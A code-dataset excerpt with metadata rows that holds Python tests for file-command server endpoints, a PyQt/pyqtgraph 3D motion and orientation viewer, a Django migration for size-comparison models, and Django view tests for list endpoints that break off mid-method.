self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/queue/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/queue/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.QUEUE, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
def test_stop(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/stop/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/stop/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.STOP, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
def test_extract(self):
def side_effect(cmd: Controller.Command):
cmd.callbacks[0].on_success()
self.controller.queue_command = MagicMock()
self.controller.queue_command.side_effect = side_effect
print(self.test_app.get("/server/command/extract/test1"))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("test1", command.filename)
uri = quote(quote("/value/with/slashes", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("/value/with/slashes", command.filename)
uri = quote(quote(" value with spaces", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual(" value with spaces", command.filename)
uri = quote(quote("value'with'singlequote", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("value'with'singlequote", command.filename)
uri = quote(quote("value\"with\"doublequote", safe=""), safe="")
print(self.test_app.get("/server/command/extract/"+uri))
command = self.controller.queue_command.call_args[0][0]
self.assertEqual(Controller.Command.Action.EXTRACT, command.action)
self.assertEqual("value\"with\"doublequote", command.filename)
def test_delete_local(self):
    """The delete_local endpoint queues a DELETE_LOCAL command for the decoded filename."""
    def side_effect(cmd: Controller.Command):
        cmd.callbacks[0].on_success()
    self.controller.queue_command = MagicMock()
    self.controller.queue_command.side_effect = side_effect
    # Each filename is double-quoted into the URL and must round-trip intact.
    for name in ("test1",
                 "/value/with/slashes",
                 " value with spaces",
                 "value'with'singlequote",
                 "value\"with\"doublequote"):
        encoded = quote(quote(name, safe=""), safe="")
        print(self.test_app.get("/server/command/delete_local/" + encoded))
        queued = self.controller.queue_command.call_args[0][0]
        self.assertEqual(Controller.Command.Action.DELETE_LOCAL, queued.action)
        self.assertEqual(name, queued.filename)
def test_delete_remote(self):
    """The delete_remote endpoint queues a DELETE_REMOTE command for the decoded filename."""
    def side_effect(cmd: Controller.Command):
        cmd.callbacks[0].on_success()
    self.controller.queue_command = MagicMock()
    self.controller.queue_command.side_effect = side_effect
    # Each filename is double-quoted into the URL and must round-trip intact.
    for name in ("test1",
                 "/value/with/slashes",
                 " value with spaces",
                 "value'with'singlequote",
                 "value\"with\"doublequote"):
        encoded = quote(quote(name, safe=""), safe="")
        print(self.test_app.get("/server/command/delete_remote/" + encoded))
        queued = self.controller.queue_command.call_args[0][0]
        self.assertEqual(Controller.Command.Action.DELETE_REMOTE, queued.action)
        self.assertEqual(name, queued.filename)
| 52.372973
| 81
| 0.688203
| 1,171
| 9,689
| 5.578992
| 0.048676
| 0.114802
| 0.101791
| 0.139293
| 0.959743
| 0.959743
| 0.959743
| 0.959743
| 0.957294
| 0.95163
| 0
| 0.00854
| 0.166065
| 9,689
| 184
| 82
| 52.657609
| 0.8
| 0.005573
| 0
| 0.9
| 0
| 0
| 0.149486
| 0.090834
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.066667
| false
| 0
| 0.026667
| 0
| 0.1
| 0.166667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b1651866937efa1d73f01ed51bd59991daaefa7
| 13,537
|
py
|
Python
|
motion_tracker.py
|
gr82morozr/realtime-graph
|
4b43db9c296253d4daa78ad818a719fd48d0c8c7
|
[
"MIT"
] | 1
|
2022-02-16T10:54:52.000Z
|
2022-02-16T10:54:52.000Z
|
motion_tracker.py
|
gr82morozr/realtime-graph
|
4b43db9c296253d4daa78ad818a719fd48d0c8c7
|
[
"MIT"
] | null | null | null |
motion_tracker.py
|
gr82morozr/realtime-graph
|
4b43db9c296253d4daa78ad818a719fd48d0c8c7
|
[
"MIT"
] | 1
|
2022-02-16T10:48:17.000Z
|
2022-02-16T10:48:17.000Z
|
#!/usr/bin/env python
import os,sys,time
import random, math
import numpy as np
import py3toolbox as tb
import multiprocessing as mp
from PyQt5 import QtGui, QtCore
from PyQt5.QtWidgets import QApplication, QOpenGLWidget
import pyqtgraph.opengl as gl
import pyqtgraph as pg
import math_helper as mh
MODULE_NAME = 'MotionTracker'
def get_config():
    """Load and return the whole JSON configuration from ./config.json."""
    config_path = './config.json'
    return tb.load_json(config_path)
"""
#
# Motion Tracker
# - 3D motion tacking
#
#
"""
class MotionTracker(mp.Process):
    """3D motion tracker: draws incoming (pX, pY, pZ) positions as a GL line.

    Runs in its own process. Samples are read (non-blocking) from ``q_in``;
    the module name is pushed onto ``q_mon`` once the Qt loop is starting so
    a supervisor can tell the viewer is up.
    """

    def __init__(self, q_in, q_mon):
        mp.Process.__init__(self)
        # Module-specific settings from ./config.json, keyed by MODULE_NAME.
        self.config = get_config()[MODULE_NAME]
        self.q_in = q_in        # input queue of {'pX','pY','pZ'} sample dicts
        self.q_mon = q_mon      # monitor queue; receives MODULE_NAME on startup
        self.trace = {}         # replaced by a GLLinePlotItem in init_plot()
        self.lines = np.array([ [0,0,0] ])  # accumulated trail, seeded at origin

    def init_plot(self):
        """Create the window, the three colored background grids and the trace."""
        self.win = pg.GraphicsWindow(size=(800,600), title="3D Motion Tracker")
        self.win.move(100, 800)
        self.win.addLayout(row=1, col=1)
        self.w = gl.GLViewWidget()
        layoutgb = QtGui.QGridLayout()
        self.win.setLayout(layoutgb)
        layoutgb.addWidget(self.w,0,0)
        self.w.opts['distance'] = 400   # initial camera distance
        self.w.setWindowTitle('GL LinePlotItem')
        self.w.setGeometry(0, 0, 2000, 2000)
        self.w.show()
        # create the background grids (one per principal plane, color-coded)
        gx = gl.GLGridItem()
        gx.setSize(200,200,200)
        gx.setColor((0, 255, 0, 80.0))
        #gx.setSpacing(3,3,3)
        gx.rotate(90, 0, 1, 0)
        self.w.addItem(gx)
        gy = gl.GLGridItem()
        gy.setSize(200,200,200)
        gy.setColor((255, 0, 0, 80.0))
        #gy.setSpacing(3,3,3)
        gy.rotate(90, 1, 0, 0)
        self.w.addItem(gy)
        gz = gl.GLGridItem()
        gz.setSize(200,200,200)
        gz.setColor((0, 0, 255, 160.0))
        #gz.setSpacing(3,3,3)
        self.w.addItem(gz)
        self.trace = gl.GLLinePlotItem(pos=self.lines, color=pg.glColor((1, 1)), width=5, antialias=True)
        self.w.addItem(self.trace)

    def update(self):
        """Poll q_in once; append the new point and redraw the trace."""
        try :
            data = self.q_in.get(False)   # non-blocking; raises when queue is empty
            if data is not None :
                point = np.array([ [ data['pX'],data['pY'], data['pZ'] ] ])
                self.lines = np.append(self.lines , point , axis=0)
                self.trace.setData(pos=self.lines, color=pg.glColor((1, 1)), width=5, antialias=True)
        except Exception :
            # Best-effort: an empty queue (or malformed sample) just skips a frame.
            pass

    def run(self):
        """Process entry point: set up Qt and drive update() from a 0 ms timer."""
        self.app = QApplication.instance()
        if self.app is None:
            self.app = QApplication([])
        self.init_plot()
        timer = QtCore.QTimer()
        timer.timeout.connect(self.update)
        timer.start(0)  # fire as fast as the event loop allows
        self.q_mon.put(MODULE_NAME)
        QApplication.exec_()
        return
"""
#
# 3D Scattor Plot data
# - Can be used to check 3D space distributions
#
#
"""
class Scatter3DViewer(mp.Process):
    """Scatter-plots incoming (mX, mY, mZ) samples in a 3D GL view.

    Runs as its own process: samples arrive on ``q_in`` and the module name
    is reported on ``q_mon`` once the Qt event loop is about to start.
    """

    def __init__(self, q_in, q_mon):
        mp.Process.__init__(self)
        self.config = get_config()[MODULE_NAME]
        self.q_in = q_in
        self.q_mon = q_mon
        self.trace = {}
        self.dots = np.array([[0, 0, 0]])

    def init_plot(self):
        """Create the window, the three background grids and the scatter item."""
        self.win = pg.GraphicsWindow(size=(800, 600), title="Scatter 3D Viewer")
        self.win.move(100, 800)
        self.win.addLayout(row=1, col=1)
        self.w = gl.GLViewWidget()
        grid_layout = QtGui.QGridLayout()
        self.win.setLayout(grid_layout)
        grid_layout.addWidget(self.w, 0, 0)
        self.w.opts['distance'] = 400
        self.w.setWindowTitle('GL LinePlotItem')
        self.w.setGeometry(0, 0, 2000, 2000)
        self.w.show()
        # Background grids: one per principal plane, color-coded; the first
        # two are rotated into the YZ and XZ planes, the third stays in XY.
        for colour, rotation in (((0, 255, 0, 80.0), (90, 0, 1, 0)),
                                 ((255, 0, 0, 80.0), (90, 1, 0, 0)),
                                 ((0, 0, 255, 160.0), None)):
            grid = gl.GLGridItem()
            grid.setSize(200, 200, 200)
            grid.setColor(colour)
            if rotation is not None:
                grid.rotate(*rotation)
            self.w.addItem(grid)
        self.trace = gl.GLScatterPlotItem(pos=self.dots)
        self.w.addItem(self.trace)

    def update(self):
        """Drain one sample from q_in (if any) and append it to the cloud."""
        try:
            sample = self.q_in.get(False)
            if sample is not None:
                new_dot = np.array([[sample['mX'], sample['mY'], sample['mZ']]])
                self.dots = np.append(self.dots, new_dot, axis=0)
                self.trace.setData(pos=self.dots, color=(255, 255, 0, 100), size=2)
        except Exception:
            # Empty queue or malformed sample: skip this refresh tick.
            pass

    def run(self):
        """Process entry point: build the UI and spin the Qt event loop."""
        self.app = QApplication.instance()
        if self.app is None:
            self.app = QApplication([])
        self.init_plot()
        refresh = QtCore.QTimer()
        refresh.timeout.connect(self.update)
        refresh.start(0)
        self.q_mon.put(MODULE_NAME)
        QApplication.exec_()
        return
"""
# ================================================
#
# Orientation 3D viewer
# - can be used to check object orentations in
#
# ================================================
"""
class Orientation3DViewer(mp.Process):
    """Draws a rotating body frame: three axis lines driven by a quaternion.

    Each sample dict supplies quaternion components qX/qY/qZ/qW; the unit
    axes are rotated by that quaternion (via math_helper.rotate_vector) and
    redrawn, so the RGB triad shows the object's current orientation.
    """

    def __init__(self, q_in, q_mon):
        mp.Process.__init__(self)
        # Module-specific settings from ./config.json, keyed by MODULE_NAME.
        self.config = get_config()[MODULE_NAME]
        self.q_in = q_in        # input queue of {'qX','qY','qZ','qW'} dicts
        self.q_mon = q_mon      # monitor queue; receives MODULE_NAME on startup
        self.trace_x = {}       # GLLinePlotItem for the X axis (red)
        self.trace_y = {}       # GLLinePlotItem for the Y axis (green)
        self.trace_z = {}       # GLLinePlotItem for the Z axis (blue)
        self.line_x = np.array([ [0,0,0] ])
        self.line_y = np.array([ [0,0,0] ])
        self.line_z = np.array([ [0,0,0] ])

    def init_plot(self):
        """Create the window, background grids and the three axis traces."""
        self.win = pg.GraphicsWindow(size=(800,600), title="Orientation 3D Viewer")
        self.win.move(100, 800)
        self.win.addLayout(row=1, col=1)
        self.w = gl.GLViewWidget()
        layoutgb = QtGui.QGridLayout()
        self.win.setLayout(layoutgb)
        layoutgb.addWidget(self.w,0,0)
        self.w.opts['distance'] = 400   # initial camera distance
        self.w.setWindowTitle('GL LinePlotItem')
        self.w.setGeometry(0, 0, 2000, 2000)
        self.w.show()
        # create the background grids (one per principal plane, color-coded)
        gx = gl.GLGridItem()
        gx.setSize(200,200,200)
        gx.setColor((0, 255, 0, 80.0))
        gx.rotate(90, 0, 1, 0)
        self.w.addItem(gx)
        gy = gl.GLGridItem()
        gy.setSize(200,200,200)
        gy.setColor((255, 0, 0, 80.0))
        gy.rotate(90, 1, 0, 0)
        self.w.addItem(gy)
        gz = gl.GLGridItem()
        gz.setSize(200,200,200)
        gz.setColor((0, 0, 255, 160.0))
        self.w.addItem(gz)
        # Axis lines start as the unrotated unit axes scaled to length 40.
        self.line_x = np.array([ [0,0,0], [40, 0, 0] ])
        self.line_y = np.array([ [0,0,0], [0, 40, 0] ])
        self.line_z = np.array([ [0,0,0], [0, 0, 40] ])
        self.trace_x = gl.GLLinePlotItem(pos=self.line_x, color=pg.glColor((255, 0, 0, 160.0)), width=10, antialias=True)
        self.w.addItem(self.trace_x)
        self.trace_y = gl.GLLinePlotItem(pos=self.line_y, color=pg.glColor((0, 255, 0, 160.0)), width=10, antialias=True)
        self.w.addItem(self.trace_y)
        self.trace_z = gl.GLLinePlotItem(pos=self.line_z, color=pg.glColor((0, 0, 255, 160.0)), width=10, antialias=True)
        self.w.addItem(self.trace_z)

    def update(self):
        """Poll q_in once; rotate the unit axes by the sample quaternion and redraw."""
        try :
            data = self.q_in.get(False)   # non-blocking; raises when queue is empty
            if data is not None :
                rot_quat = [data["qX"],data["qY"],data["qZ"],data["qW"]]
                # Rotated unit axes, scaled to length 40 for display.
                point_x = np.array([mh.rotate_vector(rot_quat, [1,0,0])]) * 40
                point_y = np.array([mh.rotate_vector(rot_quat, [0,1,0])]) * 40
                point_z = np.array([mh.rotate_vector(rot_quat, [0,0,1])]) * 40
                # Rebuild each line as origin -> rotated axis endpoint.
                self.line_x = np.array([ [0,0,0] ])
                self.line_y = np.array([ [0,0,0] ])
                self.line_z = np.array([ [0,0,0] ])
                self.line_x = np.append(self.line_x , point_x , axis=0)
                self.line_y = np.append(self.line_y , point_y , axis=0)
                self.line_z = np.append(self.line_z , point_z , axis=0)
                self.trace_x.setData(pos=self.line_x, color=((255, 0, 0, 160.0)), width=10, antialias=True)
                self.trace_y.setData(pos=self.line_y, color=((0, 255, 0, 160.0)), width=10, antialias=True)
                self.trace_z.setData(pos=self.line_z, color=((0, 0, 255, 160.0)), width=10, antialias=True)
        except Exception as err:
            # Best-effort: an empty queue (or malformed sample) skips a frame.
            #print (str(err))
            pass

    def run(self):
        """Process entry point: set up Qt and drive update() from a 0 ms timer."""
        self.app = QApplication.instance()
        if self.app is None:
            self.app = QApplication([])
        self.init_plot()
        timer = QtCore.QTimer()
        timer.timeout.connect(self.update)
        timer.start(0)  # fire as fast as the event loop allows
        self.q_mon.put(MODULE_NAME)
        QApplication.exec_()
        return
"""
# ================================================
#
# Vector 3D viewer
# - can be used to view 3D vector
#
# ================================================
"""
class Vector3DViewer(mp.Process):
    """3D vector viewer.

    Plots the raw acceleration vector ("exp.aX/aY/aZ", red) alongside the
    same vector rotated back by the quaternion "qX/qY/qZ/qW" (green), and
    accumulates both endpoints as a scatter cloud. Runs as its own process,
    reading sample dicts from ``q_in``.
    """

    def __init__(self, q_in, q_mon):
        mp.Process.__init__(self)
        # Module-specific settings from ./config.json, keyed by MODULE_NAME.
        self.config = get_config()[MODULE_NAME]
        self.q_in = q_in        # input queue of sample dicts
        self.q_mon = q_mon      # monitor queue; receives MODULE_NAME on startup
        self.trace_x = {}       # GLLinePlotItem, created in init_plot()
        self.trace_dot = {}     # GLScatterPlotItem, created in init_plot()
        self.line_x = np.array([[0, 0, 0]])
        self.dots = np.array([[0, 0, 0]])

    def init_plot(self):
        """Build the GL window, background grids, both line traces and the dots."""
        # (Title typo "Viewerr" fixed.)
        self.win = pg.GraphicsWindow(size=(800, 600), title="Vector 3D Viewer")
        self.win.move(100, 800)
        self.win.addLayout(row=1, col=1)
        self.w = gl.GLViewWidget()
        layoutgb = QtGui.QGridLayout()
        self.win.setLayout(layoutgb)
        layoutgb.addWidget(self.w, 0, 0)
        self.w.opts['distance'] = 400   # initial camera distance
        self.w.setWindowTitle('GL LinePlotItem')
        self.w.setGeometry(0, 0, 2000, 2000)
        self.w.show()
        # create the background grids (one per principal plane, color-coded)
        gx = gl.GLGridItem()
        gx.setSize(200, 200, 200)
        gx.setColor((0, 255, 0, 80.0))
        gx.rotate(90, 0, 1, 0)
        self.w.addItem(gx)
        gy = gl.GLGridItem()
        gy.setSize(200, 200, 200)
        gy.setColor((255, 0, 0, 80.0))
        gy.rotate(90, 1, 0, 0)
        self.w.addItem(gy)
        gz = gl.GLGridItem()
        gz.setSize(200, 200, 200)
        gz.setColor((0, 0, 255, 160.0))
        self.w.addItem(gz)
        self.line_x = np.array([[0, 0, 0], [40, 0, 0]])
        self.line_s = np.array([[0, 0, 0], [40, 0, 0]])  # reverse rotated vector
        self.trace_x = gl.GLLinePlotItem(pos=self.line_x, color=pg.glColor((255, 0, 0, 160.0)), width=10, antialias=True)
        self.trace_s = gl.GLLinePlotItem(pos=self.line_s, color=pg.glColor((0, 255, 0, 160.0)), width=10, antialias=True)
        self.w.addItem(self.trace_x)
        self.w.addItem(self.trace_s)
        self.trace_dot = gl.GLScatterPlotItem(pos=self.dots)
        self.w.addItem(self.trace_dot)

    def update(self):
        """Consume one sample (non-blocking) and refresh both vectors and dots."""
        try:
            data = self.q_in.get(False)
            if data is not None:
                rot_quat = [data["qX"], data["qY"], data["qZ"], data["qW"]]
                # BUG FIX: point_x was built as a 1-D (3,) array, so the
                # axis=0 append against the 2-D line buffer raised ValueError
                # (silently swallowed below) and the red trace never drew.
                # Wrap it to shape (1, 3) like point_s.
                point_x = np.array([[data["exp.aX"], data["exp.aY"], data["exp.aZ"]]]) * 60
                point_s = np.array([mh.rotate_vector(rot_quat, [data["exp.aX"], data["exp.aY"], data["exp.aZ"]], reverse=True)]) * 40
                self.line_x = np.array([[0, 0, 0]])
                self.line_x = np.append(self.line_x, point_x, axis=0)
                self.trace_x.setData(pos=self.line_x, color=((255, 0, 0, 160.0)), width=10, antialias=True)
                self.line_s = np.array([[0, 0, 0]])
                self.line_s = np.append(self.line_s, point_s, axis=0)
                self.trace_s.setData(pos=self.line_s, color=((0, 255, 0, 160.0)), width=10, antialias=True)
                self.dots = np.append(self.dots, point_x, axis=0)
                self.dots = np.append(self.dots, point_s, axis=0)
                self.trace_dot.setData(pos=self.dots, color=(255, 0, 0, 100), size=2)
        except Exception as err:
            # Best-effort: an empty queue (or malformed sample) skips a frame.
            #print (str(err))
            pass

    def run(self):
        """Process entry point: build the UI and spin the Qt event loop."""
        self.app = QApplication.instance()
        if self.app is None:
            self.app = QApplication([])
        self.init_plot()
        timer = QtCore.QTimer()
        timer.timeout.connect(self.update)
        timer.start(0)  # fire as fast as the event loop allows
        self.q_mon.put(MODULE_NAME)
        QApplication.exec_()
        return
"""
# ================================================
#
# Below are demo functions
#
# ================================================
"""
def MotionTracker_demo():
    """Feed a helix of (pX, pY, pZ) points into a MotionTracker process."""
    q_in = mp.Queue()
    q_mon = mp.Queue()
    tracker = MotionTracker(q_in=q_in, q_mon=q_mon)
    tracker.start()
    sample = {}
    for alpha in np.arange(-math.pi * 6, math.pi * 6, math.pi / 60):
        sample["pX"] = math.sin(alpha) * 30
        sample["pY"] = math.cos(alpha) * 60
        sample["pZ"] = alpha * 5
        q_in.put(sample)
        time.sleep(0.01)
def Orientation3DViewer_demo():
    """Sweep synthetic quaternion components through an Orientation3DViewer."""
    q_in = mp.Queue()
    q_mon = mp.Queue()
    viewer = Orientation3DViewer(q_in=q_in, q_mon=q_mon)
    viewer.start()
    sample = {}
    for v in np.arange(-1, 1, 0.001):
        sample["qX"] = v
        sample["qY"] = -v
        sample["qZ"] = v * 2
        sample["qW"] = v * 3
        q_in.put(sample)
        time.sleep(0.01)
def Vector3DViewer_demo():
    """Sweep synthetic quaternion components through a Vector3DViewer."""
    q_in = mp.Queue()
    q_mon = mp.Queue()
    viewer = Vector3DViewer(q_in=q_in, q_mon=q_mon)
    viewer.start()
    sample = {}
    for v in np.arange(-1, 1, 0.001):
        sample["qX"] = v
        sample["qY"] = -v
        sample["qZ"] = v * 2
        sample["qW"] = v * 3
        q_in.put(sample)
        print(sample)
        time.sleep(0.01)
def Scatter3DViewer_demo():
    """Stream points on an ellipsoid surface into a Scatter3DViewer."""
    q_in = mp.Queue()
    q_mon = mp.Queue()
    viewer = Scatter3DViewer(q_in=q_in, q_mon=q_mon)
    viewer.start()
    sample = {}
    # Ellipsoid semi-axes.
    a_axis = 100
    b_axis = 60
    c_axis = 20
    step = math.pi / 30
    for alpha in np.arange(0, math.pi, step):
        for beta in np.arange(0, math.pi * 2, step):
            sample["mX"] = a_axis * math.sin(alpha) * math.cos(beta)
            sample["mY"] = b_axis * math.sin(alpha) * math.sin(beta)
            sample["mZ"] = c_axis * math.cos(alpha)
            q_in.put(sample)
            time.sleep(0.01)
if __name__ == '__main__':
    # Pick which demo to run; the others are kept commented for quick
    # manual testing.
    #MotionTracker_demo()
    #Orientation3DViewer_demo()
    #Scatter3DViewer_demo()
    Vector3DViewer_demo()
    # Dead scratch code kept by the author (no-op string expression at runtime).
    """
    v = MotionTracker(q_in =q_in, q_mon=q_mon)
    v.start()
    dots = np.random.randint(-10,10,size=(1000,3))
    for dot in dots:
        q_in.put(dot)
        time.sleep(0.5)
    """
    pass
| 25.302804
| 134
| 0.578562
| 2,068
| 13,537
| 3.678917
| 0.102031
| 0.018139
| 0.007886
| 0.02011
| 0.821109
| 0.789432
| 0.758018
| 0.738959
| 0.724501
| 0.700447
| 0
| 0.067726
| 0.233213
| 13,537
| 534
| 135
| 25.350187
| 0.665222
| 0.04388
| 0
| 0.753754
| 0
| 0
| 0.023927
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.063063
| false
| 0.015015
| 0.03003
| 0.003003
| 0.12012
| 0.003003
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
6b1de6b693aefafd45e8891fe33bf072093a7422
| 1,364
|
py
|
Python
|
sizecompares/migrations/0001_initial.py
|
ProjectFFF/FFF
|
a563e2bb5aafe18d3fa3143d83b6558921eac8ee
|
[
"BSD-2-Clause"
] | 6
|
2020-09-02T18:48:28.000Z
|
2022-02-06T11:13:06.000Z
|
sizecompares/migrations/0001_initial.py
|
ProjectFFF/FFF
|
a563e2bb5aafe18d3fa3143d83b6558921eac8ee
|
[
"BSD-2-Clause"
] | 23
|
2020-09-04T08:57:28.000Z
|
2020-10-25T07:03:47.000Z
|
sizecompares/migrations/0001_initial.py
|
ProjectFFF/FFF
|
a563e2bb5aafe18d3fa3143d83b6558921eac8ee
|
[
"BSD-2-Clause"
] | null | null | null |
# Generated by Django 3.1.1 on 2020-10-03 18:06
from django.db import migrations, models
class Migration(migrations.Migration):
    """Initial schema for the sizecompares app: Compare and Result models.

    Both models store four body-measurement deltas as DecimalField(6,3).
    """

    # First migration for this app, so it depends on nothing.
    initial = True

    dependencies = [
    ]

    operations = [
        migrations.CreateModel(
            name='Compare',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('shoulder_compare', models.DecimalField(decimal_places=3, max_digits=6)),
                ('chest_compare', models.DecimalField(decimal_places=3, max_digits=6)),
                ('arm_compare', models.DecimalField(decimal_places=3, max_digits=6)),
                ('total_length_compare', models.DecimalField(decimal_places=3, max_digits=6)),
            ],
        ),
        migrations.CreateModel(
            name='Result',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('shoulder_result', models.DecimalField(decimal_places=3, max_digits=6)),
                ('chest_result', models.DecimalField(decimal_places=3, max_digits=6)),
                ('arm_result', models.DecimalField(decimal_places=3, max_digits=6)),
                ('total_length_result', models.DecimalField(decimal_places=3, max_digits=6)),
            ],
        ),
    ]
| 38.971429
| 114
| 0.607771
| 146
| 1,364
| 5.458904
| 0.321918
| 0.180678
| 0.250941
| 0.311167
| 0.752823
| 0.752823
| 0.752823
| 0.752823
| 0.752823
| 0.351317
| 0
| 0.030876
| 0.26393
| 1,364
| 34
| 115
| 40.117647
| 0.762948
| 0.032991
| 0
| 0.37037
| 1
| 0
| 0.104024
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.037037
| 0
| 0.185185
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8632353fc904f9b802d28a8f193a99b313bb1ae4
| 5,897
|
py
|
Python
|
codedigger/lists/tests/test_views.py
|
prayutsu/Backend
|
944c37f0941fc6836a04c5bb85936558b9b30cff
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/tests/test_views.py
|
prayutsu/Backend
|
944c37f0941fc6836a04c5bb85936558b9b30cff
|
[
"Apache-2.0"
] | null | null | null |
codedigger/lists/tests/test_views.py
|
prayutsu/Backend
|
944c37f0941fc6836a04c5bb85936558b9b30cff
|
[
"Apache-2.0"
] | null | null | null |
from .test_setup import TestSetUp
from user.models import User, Profile
from django.urls import reverse
from rest_framework.test import APIClient
from lists.models import Solved
from problem.models import Problem
class TestViews(TestSetUp):
    """View tests for the topicwise/levelwise list and ladder endpoints.

    Anonymous users may browse every listing endpoint; authenticated users
    additionally get per-problem "solved" flags that must agree with the
    Solved table.
    """

    # ---- anonymous access: listing endpoints are public ----

    def test_check_topicwise_list_all_lists_view(self):
        res = self.client.get(reverse('topicwise-list'))
        self.assertEqual(res.status_code, 200)

    def test_check_topicwise_ladder_all_ladders_view(self):
        res = self.client.get(reverse('topicwise-ladder'))
        self.assertEqual(res.status_code, 200)

    def test_check_levelwise_list_all_lists_view(self):
        res = self.client.get(reverse('levelwise-list'))
        self.assertEqual(res.status_code, 200)

    def test_check_levelwise_ladder_all_ladder_view(self):
        res = self.client.get(reverse('levelwise-ladder'))
        self.assertEqual(res.status_code, 200)

    # ---- helpers for the authenticated checks ----

    def _authed_client(self):
        """Log in the fixture user; return (user, APIClient with Bearer token)."""
        user = User.objects.get(username="testing")
        user.set_password(self.user_data['password'])
        user.save()
        res = self.client.post(self.login_url, self.user_data, format="json")
        token = res.data['tokens']['access']
        client = APIClient()
        client.credentials(HTTP_AUTHORIZATION='Bearer ' + token)
        return user, client

    def _solved_flags_consistent(self, user, entries):
        """Return True iff every entry flagged solved has a Solved row for user.

        Mirrors the serializer's field order: index 12 of an entry's values
        is the "solved" flag and index 2 is the problem id.
        """
        for entry in entries:
            values = list(entry.values())
            if values[12]:
                problem = Problem.objects.get(prob_id=values[2])
                if not Solved.objects.filter(user=user, problem=problem).exists():
                    return False
        return True

    def _assert_authed_list_ok(self, test_url):
        """GET test_url as the fixture user; assert status and solved flags.

        BUG FIX: the original tests chained the two checks as
        ``self.assertEqual(...) and self.assertEqual(ok, True)``. assertEqual
        returns None, so the ``and`` short-circuited and the second assertion
        never executed. Both checks are now asserted explicitly.
        """
        user, client = self._authed_client()
        res = client.get(test_url, format="json")
        self.assertEqual(res.status_code, 200)
        self.assertTrue(self._solved_flags_consistent(user, res.data['result']))

    # ---- authenticated access: solved flags must match the Solved table ----

    def test_auth_check_topicwise_list_view(self):
        self._assert_authed_list_ok(reverse('topicwise-list') + "testinglist_topicwise")

    def test_auth_check_topicwise_ladder_view(self):
        self._assert_authed_list_ok(reverse('topicwise-ladder') + "testinglist_topicwise")

    def test_auth_check_levelwise_list_view(self):
        self._assert_authed_list_ok(reverse('levelwise-list') + "testinglist_levelwise")

    def test_auth_check_levelwise_ladder_view(self):
